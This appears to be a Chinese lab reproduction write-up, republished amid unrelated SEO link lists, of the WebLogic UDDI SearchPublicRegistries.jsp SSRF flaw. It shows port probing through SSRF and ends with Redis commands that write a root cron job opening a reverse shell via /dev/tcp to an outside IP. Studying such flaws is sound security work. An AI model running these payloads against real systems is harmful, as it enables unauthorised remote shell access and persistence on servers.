当前位置: 首页 > wzjs >正文

做名片用哪个网站厦门市建设与管理局

做名片用哪个网站,厦门市建设与管理局,企业网站的优点和缺点,wordpress 目录标签化漏洞概述: Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 漏洞形成原因: WebLogic Server 的 UDDI 组件(uddiexplorer.war)中的 SearchPublicR…

漏洞概述:

Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。

漏洞形成原因:

WebLogic Server 的 UDDI 组件(uddiexplorer.war)中的 SearchPublicRegistries.jsp 文件。该文件允许用户输入外部 URL,但未对输入的 URL 进行严格的过滤和验证,导致攻击者可以利用此功能发起任意 HTTP 请求

影响范围:

weblogic 版本10.0.2--10.3.6

复现

1,访问7001这样就是搭建成功了

2,在url处访问ip:7001/uddiexplorer/,可查看uddiexplorer应用

3,漏洞位置存在于http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp,在表单中随意输入内容使用burp抓包,发送到重放模块

4,可以看到数据包有一个url,我们通过更改进行测试

5, 当访问一个可用端口时,会收到一个带有状态码的错误响应。如果访问的是非HTTP协议,则会返回"did not have a valid SOAP content-type"错误。

6,当访问一个不存在的端口时,响应会显示"could not connect over HTTP to server"。

7, 我们通过命令进入容器里面获取ip地址

docker exec -it 32da04e35583 /bin/bash

netstat -tuln

8,然后通过ssrf探测端口,发现了6379,存在redis未授权, 将反弹 shell 的脚本写入目录/etc/crontab(这个目录下是一个默认自动执行的一些 crontab 定时服务命令,里面都写的是一些开启服务的命令)

set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/evil/192.168.43.133/6666 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

http://www.dtcms.com/wzjs/814176.html

相关文章:

  • 湖北商城网站建设北京手机版建站系统开发
  • 360网站地图怎么做南宁学做网站
  • wordpress手机号登陆保定网站建设seo优化营销
  • 郑州网站建设微信小程序知名企业网站人才招聘情况
  • 创新型的网站建设百度下载安装到桌面上
  • 施工程找工程做哪个网站好公司小程序如何申请
  • 杭州网站开发工资重庆公司章程如何查询下载
  • 网站访问量统计工具静态网站建设步骤
  • 天津网站运营企业网站建设作用
  • 欣赏艺术类的网站Wordpress搜索html页面
  • 手机营销型网站制作潍坊市住房和城乡建设局官网
  • 网站收录了怎么做排名嘉兴企业网站排名
  • 专业提供网站建设服务18岁以上准备好纸巾免费网站
  • 大型网站建设建站模板网站建设培训 通州
  • 百度网站搜索排名网站建设管理分工
  • 西安建设市场信息平台在seo优化中
  • 太原网站制作公司飞向未来煎蛋wordpress
  • 网站设计制作全网优惠抖音广告投放平台
  • 哪个网站可以做链接长沙微网站建设
  • 犀浦网站建设域名注册服务机构注销域名的情形
  • 乌镇网站开发文档璧山最新消息
  • 网站优化 秦皇岛邢台微信网站
  • 做资讯的网站嘉定网站建设哪里便宜
  • 如何在网站申请做co建设一个聊天类的网站
  • 怎么制作个人网站关键词seo深圳
  • 做网站培训班泉州网页建站模板
  • 网站要实名认证吗手机制图设计免费软件下载
  • wordpress 企业站模版营销网站建设内容
  • nas服务器 做网站微信公众平台注册不了
  • aspx网站配置服务器深圳最大的手机市场在什么地方